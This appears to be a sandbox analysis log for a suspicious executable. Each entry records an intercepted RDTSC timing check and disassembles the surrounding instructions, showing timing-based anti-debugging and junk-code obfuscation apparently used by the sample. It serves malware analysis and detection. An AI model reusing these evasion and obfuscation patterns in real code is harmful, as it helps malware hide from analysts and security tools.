Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D9E1 second address: 151D9E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D9E6 second address: 151D9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 je 00007F6FA452481Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151F178 second address: 151F17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15218A2 second address: 15218A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15218A6 second address: 1521908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 1257AC31h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F6FA52293B8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 pushad 0x00000029 cmc 0x0000002a call 00007F6FA52293BDh 0x0000002f mov cx, dx 0x00000032 pop edx 0x00000033 popad 0x00000034 call 00007F6FA52293B9h 0x00000039 jne 00007F6FA52293C2h 0x0000003f push eax 0x00000040 pushad 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1521908 second address: 1521923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6FA4524824h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1521923 second address: 152194A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F6FA52293C5h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152194A second address: 152195A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152195A second address: 152195F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15225C0 second address: 15225C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15225C4 second address: 15225E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6FA52293C9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522921 second address: 1522927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522ABF second address: 1522AC9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6FA52293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522AC9 second address: 1522AE2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6FA4524818h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6FA452481Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522AE2 second address: 1522AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522AE8 second address: 1522AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522EDC second address: 1522EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F6FA52293C0h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522EF9 second address: 1522F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D2D93h], ebx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F6FA4524818h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F6FA4524818h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 add si, 4816h 0x0000004a xchg eax, ebx 0x0000004b push edx 0x0000004c jc 00007F6FA452481Ch 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522F5B second address: 1522F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jl 00007F6FA52293B6h 0x0000000f jne 00007F6FA52293B6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522F71 second address: 1522F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1522F77 second address: 1522F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15236D2 second address: 15236DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6FA4524816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1524130 second address: 1524142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6FA52293BCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15236DC second address: 152370B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6FA4524818h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jno 00007F6FA452482Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1524947 second address: 152494D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152494D second address: 1524974 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6FA4524818h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F6FA4524820h 0x00000013 je 00007F6FA4524816h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1524974 second address: 152497A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1525361 second address: 15253BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F6FA4524818h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 sbb edi, 3C711DC7h 0x0000002e push 00000000h 0x00000030 mov esi, dword ptr [ebp+12459475h] 0x00000036 xchg eax, ebx 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a ja 00007F6FA4524816h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15253BC second address: 15253DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F6FA52293C3h 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1525EFC second address: 1525F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1525CE0 second address: 1525D09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6FA52293C0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152A0D4 second address: 152A0D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1527316 second address: 152731A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1527F2B second address: 1527F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152A0D8 second address: 152A0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152A0E2 second address: 152A0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152A0E6 second address: 152A101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6FA52293C1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152A101 second address: 152A180 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add edi, dword ptr [ebp+1247E896h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F6FA4524818h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jbe 00007F6FA4524827h 0x00000031 jmp 00007F6FA4524821h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F6FA4524818h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D1AECh] 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F6FA4524820h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152B208 second address: 152B20C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152B20C second address: 152B268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2A9Eh], eax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F6FA4524818h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c add di, CE3Eh 0x00000031 push 00000000h 0x00000033 pushad 0x00000034 mov dword ptr [ebp+122D2FFDh], ebx 0x0000003a mov dword ptr [ebp+122D244Dh], edi 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jl 00007F6FA4524816h 0x0000004b jmp 00007F6FA452481Ah 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C17B second address: 152C17F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C17F second address: 152C189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C189 second address: 152C1AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F6FA52293C5h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1AC second address: 152C1BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA452481Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1BA second address: 152C1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1BE second address: 152C1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor dword ptr [ebp+1247E54Ah], ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+1245AA31h], edi 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1DE second address: 152C1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1E2 second address: 152C1E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152C1E8 second address: 152C1FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F6FA52293B6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152D314 second address: 152D318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152D318 second address: 152D31C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152D31C second address: 152D327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 152D3E4 second address: 152D3FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1532715 second address: 153271A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15354D3 second address: 15354DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6FA52293B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15354DE second address: 15354E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15354E4 second address: 1535567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F6FA52293D0h 0x00000012 jnc 00007F6FA52293CAh 0x00000018 nop 0x00000019 xor dword ptr [ebp+122D2A9Eh], ecx 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F6FA52293B8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b add edi, dword ptr [ebp+122D3949h] 0x00000041 push 00000000h 0x00000043 mov dword ptr [ebp+122D1E59h], ebx 0x00000049 xchg eax, esi 0x0000004a pushad 0x0000004b pushad 0x0000004c push ecx 0x0000004d pop ecx 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15337B6 second address: 15337BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15337BB second address: 15337C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15337C0 second address: 153384C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6FA4524816h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e sub dword ptr [ebp+122D2133h], ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov bh, D7h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 jns 00007F6FA452481Ch 0x0000002a mov eax, dword ptr [ebp+122D0275h] 0x00000030 xor edi, 52A6B300h 0x00000036 push FFFFFFFFh 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F6FA4524818h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 call 00007F6FA4524829h 0x00000057 jno 00007F6FA452481Ch 0x0000005d pop edi 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15374B3 second address: 15374B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15374B7 second address: 15374C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1536790 second address: 1536795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1536795 second address: 15367AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA4524825h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1538557 second address: 1538567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA52293BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1538567 second address: 153856B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1537653 second address: 1537659 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1538709 second address: 153870F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 153A562 second address: 153A566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 153A566 second address: 153A56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15397B9 second address: 15397D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BFh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 153D3A8 second address: 153D3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6FA452481Dh 0x00000011 jmp 00007F6FA452481Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 153D3D2 second address: 153D3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14E199F second address: 14E19B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F6FA4524816h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F6FA4524816h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14E19B8 second address: 14E19DE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6FA52293B6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6FA52293C7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14E19DE second address: 14E19EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F6FA4524816h 0x0000000a ja 00007F6FA4524816h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14E19EE second address: 14E19F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 154159D second address: 15415BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F6FA4524818h 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F6FA4524820h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1545EE8 second address: 1545F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6FA52293B6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F6FA52293C3h 0x00000011 popad 0x00000012 pushad 0x00000013 jnc 00007F6FA52293B6h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e rdtsc
